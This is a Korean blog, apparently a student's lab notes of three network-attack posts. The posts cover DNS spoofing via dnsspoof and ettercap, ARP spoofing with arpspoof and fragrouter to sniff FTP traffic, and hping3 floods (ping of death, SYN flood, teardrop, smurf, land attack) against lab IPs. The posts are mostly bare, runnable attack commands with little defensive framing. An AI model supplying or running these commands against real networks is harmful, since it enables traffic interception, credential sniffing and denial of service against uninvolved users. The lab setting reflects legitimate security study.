칼리에서 실행

# service apache2 restart

 

 

arp 스푸핑 후,

 

vi dns.txt

 

dnsspoof -f /root/dns.txt

 

windows 7에서 위의 도메인을 치게되면 칼리에서 만든 웹페이지로 접속 된다.

 

 

 

ettercap

vi /etc/ettercap/etter.dns    

 

ettercap -G  //dettercap 실행

 

scan을 해서 공격 대상자를 찾는다.

 

scan한 리스트를 확인한다.

arp 포이즈닝을 통해 맥주소를 같게 만들어준다.

 

게이트웨이를 타겟1로 설정

공격 대상자를 타겟2로 설정

 

공격플러그인 목록

 

dns_spoof 플러그인 선택

 

 

아까 etter.dns안에 넣은 도메인 주소가 공격자 도메인으로 바뀜.

 

 

 

 

 

 

 

 

 

 

 

 

 

 


 

 

 


 

 

'Network Security' 카테고리의 다른 글

ssh 스니핑  (0) 2019.02.08
ettercap dos공격  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07
Dos  (0) 2019.02.01
john the ripper  (0) 2019.02.01

arpspoof

 

 

 

공격자 : 192.168.232.100

공격 대상자 (windows7) : 192.168.232.120

 

arpspoof -t [타겟 ip] [게이트웨이]

arpspoof -t 192.168.232.120 192.168.232.2

 

 

 

 

 

공격자와 게이트웨이의 맥주소가 같아지면 스푸핑 공격이 성공한 것이다.

 

 

arpspoof -t 192.168.232.2 192.168.232.120

 //반대로 한번 더 확실하게 스푸핑됨. 이 작업을 하게 되면

   fragrouter로도 인터넷이 안될 때도 있다.

 

fragrouter -B1

//칼리에서 공격한 후 즉시 실행 해줘야 공격 대상자의 인터넷이 안끈킴

 

 

게이트웨이 맥주소와 공격자의 맥주소가 같아지면 성공한 것이다.


 

 

ftp에 접속을 하게 되면

이런식으로 스니핑이 가능하다.

 

 

 

 

'Network Security' 카테고리의 다른 글

ettercap dos공격  (0) 2019.02.07
DNS 스푸핑  (0) 2019.02.07
Dos  (0) 2019.02.01
john the ripper  (0) 2019.02.01
스캐닝  (0) 2019.01.30

공격자 ip :192.168.232.100

대상자 ip :192.168.232.101

 

 

ping of death

 

hping3 --icmp --rand-source 192.168.232.101 -d 65000 --flood

//랜덤한 아이피 주소로 192.168.232.101 에게 핑을 최대크기로 보낸다.

 

 

공격 당한 컴퓨터 상태


 

 

속도가 엄청 느려진것 을 느낄수 있다.

Syn Flooding

hping3 --rand-source 192.168.232.101 -p 80 -S --flood

//Syn 패킷을 보냄

 

 

공격 당한 컴퓨터 상태

//메모리까지 상승하게 된다.

 

 

Tear Drop  //패킷분할공격

hping3 -a 192.168.232.100 192.168.232.101 --id 3200 -o 123456 -M 3232 -p 21 -d 3200 --flood

 

 

smurf 공격

hping3 -a 192.168.232.101 192.168.232.255 --icmp --flood

 

land attack

hping3 -a 192.168.232.101 192.168.232.101 --icmp --flood

 

centos7 작업관리자 //gnome-system-monitor

 

'Network Security' 카테고리의 다른 글

DNS 스푸핑  (0) 2019.02.07
arp 스푸핑  (0) 2019.02.07
john the ripper  (0) 2019.02.01
스캐닝  (0) 2019.01.30
ACL(접근 통제 목록)  (0) 2019.01.29

+ Recent posts